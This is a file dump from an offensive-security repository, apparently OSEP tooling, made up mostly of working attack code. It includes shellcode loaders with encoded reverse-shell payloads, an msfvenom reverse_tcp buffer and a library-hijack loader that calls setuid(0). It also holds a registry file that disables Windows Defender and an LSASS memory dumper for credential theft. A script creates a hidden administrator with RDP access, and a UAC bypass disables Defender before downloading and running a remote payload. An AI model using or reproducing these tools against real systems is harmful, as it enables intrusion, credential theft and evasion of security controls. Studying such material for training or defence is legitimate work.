https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/System.Management.Automation.dll -------------------------------------------------------------------------------- /Misc/MiniDump/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Misc/PSLessExec/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/Release/examine.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/Release/examine.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.write.1u.tlog -------------------------------------------------------------------------------- /Active_Directory/sql/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll -------------------------------------------------------------------------------- /Loaders_Disk/clhollow/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/clinject/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/clrunner/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/test/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active_Directory/sql/bin/Debug/sql.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\User\shakeitoff\| 3 | -------------------------------------------------------------------------------- /Active_Directory/sql/bin/x64/Release/sql.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/Release/altbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe.recipe: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | C:\Users\User\shakeitoff\x64\Release\shakeitoff.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Loaders_Disk/formatters/formatshellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | var = "" 4 | array = [] 5 | with open(sys.argv[1]) as f: 6 | for line in f: 7 | array.append(line) 8 | for line in array: 9 | if line == array[0]: 10 | pass 11 | elif line == array[-1]: 12 | line = line.strip(" };\n") 13 | var = var + line 14 | else: 15 | line = line.strip("\n") 16 | var = var + line 17 | 18 | print(var) 19 | -------------------------------------------------------------------------------- /Other/disable_realtime_protection.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] 4 | "DisableAntiSpyware"=dword:00000001 5 | 6 | [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection] 7 | "DisableBehaviorMonitoring"=dword:00000001 8 | "DisableOnAccessProtection"=dword:00000001 9 | "DisableScanOnRealtimeEnable"=dword:00000001 10 | -------------------------------------------------------------------------------- /Other/enable_realtime_protection.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] 4 | "DisableAntiSpyware"=dword:00000000 5 | 6 | [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection] 7 | "DisableBehaviorMonitoring"=dword:00000000 8 | "DisableOnAccessProtection"=dword:00000000 9 | "DisableScanOnRealtimeEnable"=dword:00000000 10 | -------------------------------------------------------------------------------- /Misc/Autos/PS-Cheatsheet.ps1: -------------------------------------------------------------------------------- 1 | # get pid / proc name 2 | $myId=[System.Diagnostics.Process]::GetCurrentProcess().Id 3 | get-process | findstr $myId 4 | 5 | # determine if 64-bit ps 6 | [Environment]::Is64BitProcess 7 | 8 | # determine if running in syswow64 9 | $env:PROCESSOR_ARCHITEW6432 -eq 'AMD64' 10 | 11 | # list semi-important dirs in user home 12 | Get-ChildItem -Recurse -Attributes Hidden .\Desktop\,.\Documents\,.\Downloads\ 13 | 14 | # Check current language mode 15 | $ExecutionContext.SessionState.LanguageMode -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/dll/Template.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Linq; 3 | using System.Text; 4 | using System.Diagnostics; 5 | using System.Runtime.InteropServices; 6 | using System.IO; 7 | using System.Security.Cryptography; 8 | using System.Collections.Generic; 9 | namespace dll 10 | { 11 | [ComVisible(true)] 12 | public class Class1 13 | { 14 | 15 | public static void runner() 16 | { 17 |
18 | } 19 | 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /payloads/AppLocker_Bypass/nonDN2J.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Loaders_Disk/formatters/README.md: -------------------------------------------------------------------------------- 1 | # Formatters 2 | 3 | Basic, hotfix scripts to format shellcode in a way that one of the other projects can use it. 4 | 5 | ## ToC 6 | 7 | | Application | Output | Notes | 8 | | ----------- | ------ | ----- | 9 | | `formatters/port_ipeggs.py` | TXT | Python3 script to format C# shellcode output by msfvenom into proper format for use with `Powerinject` & `Powerhollow` | 10 | | `formatters/bin_to_vbappArray.py` | TXT | Python3 script to format raw `.bin` shellcode files into proper format for use in VBA Macros | 11 | | `formatters/formatshellcode.py` | TXT | Python3 script to format C# shellcode output by msfvenom into proper format for use with `Builder.exe` | 12 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Linq; 3 | using System.Text; 4 | using System.Diagnostics; 5 | using System.ServiceProcess; 6 | using System.Runtime.InteropServices; 7 | using System.IO; 8 | using System.Security.Cryptography; 9 | using System.Collections.Generic; 10 | 11 | namespace service 12 | { 13 | static class Program 14 | { 15 | /// 16 | /// The main entry point for the application. 17 | /// 18 | static void Main() 19 | { 20 | ServiceBase[] ServicesToRun; 21 | ServicesToRun = new ServiceBase[] 22 | { 23 | new Service1() 24 | }; 25 | ServiceBase.Run(ServicesToRun); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/Template.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Linq; 3 | using System.Text; 4 | using System.Diagnostics; 5 | using System.Runtime.InteropServices; 6 | using System.IO; 7 | using System.Security.Cryptography; 8 | using System.Collections.Generic; 9 | 10 | namespace exe 11 | { 12 | class Program 13 | { 14 | 15 | public static void Main() 16 | { 17 |
18 | } 19 | 20 | } 21 | 22 | 23 | [System.ComponentModel.RunInstaller(true)] 24 | public class Loader : System.Configuration.Install.Installer 25 | { 26 | public override void Uninstall(System.Collections.IDictionary savedState) 27 | { 28 | base.Uninstall(savedState); 29 | Program.Main(); 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/Template.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Diagnostics; 6 | using System.Linq; 7 | using System.ServiceProcess; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Runtime.InteropServices; 11 | using System.IO; 12 | using System.Security.Cryptography; 13 | 14 | namespace service 15 | { 16 | public partial class Service1 : ServiceBase 17 | { 18 | public Service1() 19 | { 20 | InitializeComponent(); 21 | } 22 | 23 | protected override void OnStart(string[] args) 24 | { 25 |
26 | } 27 | 28 | protected override void OnStop() 29 | { 30 | } 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /Loaders_Disk/bins/README.md: -------------------------------------------------------------------------------- 1 | # Binaries 2 | 3 | ## ToC 4 | 5 | | Application | Output | Notes | 6 | | ----------- | ------ | ----- | 7 | | `bins/x64_met_staged_reversetcp_inject.exe` | N/A | Command line args: IP PORT PROCESS_TO_INJECT(explorer) | 8 | | `bins/x64_met_staged_reversetcp_hollow.exe` | N/A | Command line args: IP PORT PROCESS_TO_HOLLOW(c:\\windows\\system32\\svchost.exe) PPID_SPOOF(explorer) | 9 | | `bins/x64_met_staged_reversehttps_inject.exe` | N/A | Command line args: IP PORT PROCESS_TO_INJECT(explorer) | 10 | | `bins/x64_met_staged_reversehttps_hollow.exe` | N/A | Command line args: IP PORT PROCESS_TO_HOLLOW(c:\\windows\\system32\\svchost.exe) PPID_SPOOF(explorer) | 11 | 12 | 13 | This directory just holds precompiled binaries created with the `clhollow` and `clinject` projects using `windows/x64/meterpreter/reverse_https` and `windows/x64/meterpreter/reverse_tcp` payloads. 14 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/simpleLoader.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // To compile: 6 | // gcc -o simpleLoader simpleLoader.c -z execstack 7 | 8 | // XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa) 9 | unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA"; 10 | 11 | int main (int argc, char **argv) 12 | { 13 | int key = 250; 14 | int buf_len = (int) sizeof(buf); 15 | 16 | // Decode the payload 17 | for (int i=0; i 4 | #include 5 | 6 | class FileOpLock 7 | { 8 | public: 9 | typedef void(*UserCallback)(); 10 | 11 | static FileOpLock* CreateLock(const std::wstring& name, FileOpLock::UserCallback cb, HANDLE p_provided = INVALID_HANDLE_VALUE); 12 | void WaitForLock(UINT Timeout); 13 | 14 | ~FileOpLock(); 15 | private: 16 | 17 | HANDLE g_hFile; 18 | OVERLAPPED g_o; 19 | REQUEST_OPLOCK_INPUT_BUFFER g_inputBuffer; 20 | REQUEST_OPLOCK_OUTPUT_BUFFER g_outputBuffer; 21 | HANDLE g_hLockCompleted; 22 | PTP_WAIT g_wait; 23 | UserCallback _cb; 24 | 25 | FileOpLock(UserCallback cb); 26 | 27 | static void CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance, 28 | PVOID Parameter, PTP_WAIT Wait, 29 | TP_WAIT_RESULT WaitResult); 30 | 31 | void DoWaitCallback(); 32 | 33 | bool BeginLock(const std::wstring& name, HANDLE p_provided = INVALID_HANDLE_VALUE); 34 | 35 | }; 36 | 37 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/exploit.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | class Exploit 7 | { 8 | public: 9 | Exploit(const std::string& p_msi_path, const std::string& p_target_path, const std::string& p_install_path); 10 | ~Exploit(); 11 | 12 | void load_ntdll(); 13 | void exploit_thread(); 14 | void callback_one(); 15 | void callback_two(); 16 | bool create_temp_files(); 17 | 18 | private: 19 | 20 | const std::string m_msi_path; 21 | const std::string m_target_path; 22 | const std::string m_tmp_base_path; 23 | std::string m_cb_directory; 24 | HANDLE m_cb_directory_handle; 25 | const std::string m_tmp_inner_path; 26 | const std::string m_tmp_inner_tmp; 27 | const std::string m_tmp_outter_file; 28 | const std::string m_tmp_lock_file; 29 | std::string m_rbf_path; 30 | std::string m_rbf_name; 31 | HANDLE m_rbf_handle; 32 | HANDLE m_lock_handle; 33 | HANDLE m_inner_shake_directory_handle; 34 | }; -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/winglue.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef struct _REPARSE_DATA_BUFFER { 6 | ULONG ReparseTag; 7 | USHORT ReparseDataLength; 8 | USHORT Reserved; 9 | union { 10 | struct { 11 | USHORT SubstituteNameOffset; 12 | USHORT SubstituteNameLength; 13 | USHORT PrintNameOffset; 14 | USHORT PrintNameLength; 15 | ULONG Flags; 16 | WCHAR PathBuffer[1]; 17 | } SymbolicLinkReparseBuffer; 18 | struct { 19 | USHORT SubstituteNameOffset; 20 | USHORT SubstituteNameLength; 21 | USHORT PrintNameOffset; 22 | USHORT PrintNameLength; 23 | WCHAR PathBuffer[1]; 24 | } MountPointReparseBuffer; 25 | struct { 26 | UCHAR DataBuffer[1]; 27 | } GenericReparseBuffer; 28 | } DUMMYUNIONNAME; 29 | } REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER; 30 | #define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer) 31 | -------------------------------------------------------------------------------- /Loaders_Disk/formatters/portip_eggs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | var = "" 4 | array = [] 5 | if len(sys.argv) == 1 or len(sys.argv) != 4: 6 | sys.exit("usage: python3 portip_eggs.py ") 7 | with open(sys.argv[1]) as f: 8 | for line in f: 9 | array.append(line) 10 | for line in array: 11 | if line == array[0]: 12 | pass 13 | elif line == array[-1]: 14 | line = line.strip(" };\n") 15 | var = var + line 16 | else: 17 | line = line.strip("\n") 18 | var = var + line 19 | #convert sysargv2 (ip) in hex 20 | iparray = sys.argv[2].split(".") 21 | x=0 22 | for i in iparray: 23 | temp = hex(int(i)) 24 | if len(temp) == 3: 25 | temp = "0x0" + temp[-1] 26 | iparray[x] = temp 27 | x = x + 1 28 | ipbytes = ",".join(iparray) 29 | 30 | #convert sysargv3 (port) in hex 31 | port = hex(int(sys.argv[3])) 32 | firstbyte = "0x00" 33 | if len(port) > 4: 34 | if len(port) == 5: 35 | firstbyte = "0x0" + port[2] 36 | else: 37 | firstbyte = "0x" + port[2] + port[3] 38 | secondbyte = "0x" + port[-2] + port[-1] 39 | portbytes = firstbyte + "," + secondbyte 40 | 41 | var = var.replace(ipbytes,"0x11,0x11,0x11,0x11").replace(portbytes,"0x22,0x22") 42 | print(var) 43 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/simpleXORencoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // To compile: 6 | // gcc simpleXORencoder.c -o simpleXORencoder 7 | 8 | // msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.45.191 LPORT=443 -f c 9 | unsigned char buf[] = 10 | "\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" 11 | "\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51" 12 | "\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" 13 | "\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" 14 | "\x01\xbb\xc0\xa8\x2d\xbf\x51\x48\x89\xe6\x6a\x10\x5a\x6a" 15 | "\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" 16 | "\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" 17 | "\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" 18 | "\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" 19 | "\x78\xed\xff\xe6"; 20 | 21 | int main (int argc, char **argv) 22 | { 23 | int key = 250; 24 | int buf_len = (int) sizeof(buf); 25 | 26 | printf("XOR payload (key 0xfa):\n"); 27 | 28 | for(int i=0; i 7 | /// Required designer variable. 8 | /// 9 | private System.ComponentModel.IContainer components = null; 10 | 11 | /// 12 | /// Clean up any resources being used. 13 | /// 14 | /// true if managed resources should be disposed; otherwise, false. 15 | protected override void Dispose(bool disposing) 16 | { 17 | if (disposing && (components != null)) 18 | { 19 | components.Dispose(); 20 | } 21 | base.Dispose(disposing); 22 | } 23 | 24 | #region Component Designer generated code 25 | 26 | /// 27 | /// Required method for Designer support - do not modify 28 | /// the contents of this method with the code editor. 29 | /// 30 | private void InitializeComponent() 31 | { 32 | components = new System.ComponentModel.Container(); 33 | this.ServiceName = "Service1"; 34 | } 35 | 36 | #endregion 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/sharedLibrary_LD_LIBRARY_PATH.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // Compile as follows 8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c 9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl 10 | 11 | static void runmahpayload() __attribute__((constructor)); 12 | 13 | int gpgrt_onclose; 14 | // [...output from readelf here...] 15 | int gpgrt_poll; 16 | 17 | // ROT13-encoded 'linux/x64/shell_reverse_tcp' payload 18 | char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12"; 19 | 20 | void runmahpayload() { 21 | setuid(0); 22 | setgid(0); 23 | printf("Library hijacked!\n"); 24 | int buf_len = (int) sizeof(buf); 25 | for (int i=0; i" 36 | } 37 | Create-Admin -------------------------------------------------------------------------------- /payloads/Misc/Create-Admin.ps1: -------------------------------------------------------------------------------- 1 | #Requires -RunAsAdministrator 2 | # (New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/Create-Admin.ps1') | IEX 3 | function Test-Administrator 4 | { 5 | $user = [Security.Principal.WindowsIdentity]::GetCurrent(); 6 | (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 7 | } 8 | 9 | function Create-Admin{ 10 | # Create an Administrator user on the box and enable RDP (Requires Admin Privs) 11 | [CmdletBinding()] 12 | param ( 13 | $username="nbaYoungboy", 14 | $password="5laaat23!" 15 | ) 16 | if( !(Test-Administrator) ){ 17 | Write-Output "This must be ran as an Administrator." 18 | Return 19 | } 20 | 21 | # Create new local administrator 22 | net user $username $password /add && net localgroup administrators $username /add && net localgroup "Remote Desktop Users" $username /add 23 | 24 | # Enable RDP if it's currently disabled 25 | $RDP = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" 26 | if ($RDP.fDenyTSConnections -eq 1) { 27 | Write-Output "Enabling Remote Desktop..." 28 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 29 | netsh advfirewall firewall set rule group='remote desktop' new enable=Yes 30 | Write-Output "Remote Desktop is now enabled." 31 | } else { 32 | Write-Output "Remote Desktop is already enabled." 33 | } 34 | 35 | Write-Host "xfreerdp +clipboard /dynamic-resolution /u:"+$username+" /p:'"+$password+"' /tls-seclevel:0 /v:" 36 | } 37 | Create-Admin -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/shakeitoff.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace MiniDump 7 | { 8 | public class MiniDump 9 | { 10 | static int MiniDumpWithFullMemory = 2; 11 | static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF; 12 | 13 | [DllImport("Dbghelp.dll")] 14 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); 15 | 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 18 | 19 | public static void Main(string[] args) 20 | { 21 | // Get the PID of lsass.exe 22 | Process[] lsass = Process.GetProcessesByName("lsass"); 23 | int lsass_pid = lsass[0].Id; 24 | Console.WriteLine($"Got lsass.exe PID: {lsass_pid}."); 25 | 26 | // Get a handle on LSASS 27 | IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid); 28 | Console.WriteLine($"Got a handle on lsass.exe: {handle}."); 29 | 30 | // Dump LSASS process to file 31 | string filePath = "C:\\Windows\\tasks\\lsass.dmp"; 32 | FileStream dumpFile = new FileStream(filePath, FileMode.Create); 33 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 34 | if (dumped) 35 | { 36 | Console.WriteLine($"Dumped LSASS memory to {filePath}."); 37 | } 38 | else 39 | { 40 | Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}"); 41 | } 42 | } 43 | } 44 | } -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/Shellcode-Encryption/readme.md: -------------------------------------------------------------------------------- 1 | Shellcode wrapper written in Python and C++ to bypass antivirus 2 | ============ 3 | 4 | > `@hackinAggie` 5 | > NOTE: Credits to the original at https://github.com/yashmundra/Shellcode-Encryption/tree/master 6 | > 7 | > I simply fixed the path for the `shellcode_encoder.py` script to be able to output **CSHARP** payloads in python3, and added the `pycryptodome` requirement. I also gutted the CPP and Python templates to save space. 8 | 9 | The technique uses two kind of code file: 10 | 11 | 1. The shellcode encoder/encrypter: `shellcode_encoder.py` 12 | 2. Various shellcode wrapper, in C++, C# and Python: 13 | - `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption 14 | - `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption 15 | - `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption 16 | 17 | Installation 18 | ---------------------- 19 | Installation is straight forward: 20 | * Git clone this repository: 21 | * cd into the folder 22 | * Install requirements using `pip install -r requirements.txt` 23 | * Give the execution rights to the main script: `chmod +x shellcode_encoder.py` 24 | 25 | Usage 26 | ---------------------- 27 | First, you need to obtain a usable shellcode from metasploit (*run it from a Kali distribution*), so something like: 28 | ``` 29 | root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw 30 | ``` 31 | 32 | Second, run the `shellcode_encoder.py` script along with the desired arguments: 33 | - raw shellcode filename 34 | - encryption key 35 | - encryption type: `xor` or `aes` 36 | - desired output: `base64`, `cpp`, `csharp`, `python` 37 | 38 | This will generate C#, C++ and Python code file in the `result` folder. Those files are ready to use/compile. 39 | -------------------------------------------------------------------------------- /Privilege_Escalation/UACBypass.ps1: -------------------------------------------------------------------------------- 1 | function alt { 2 | #Disables win defender and calls powershell payload for additional reverse shell w/ elevation. Note that type of payload matters! Calling a remote injector/hollower w/ ppid spoof will \ 3 | # give you a system shell, if you want a normal one call a standard runner. 4 | #Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled \ 5 | # -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'') 6 | Param ( 7 | [String]$program = 'Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'')' 8 | ) 9 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" 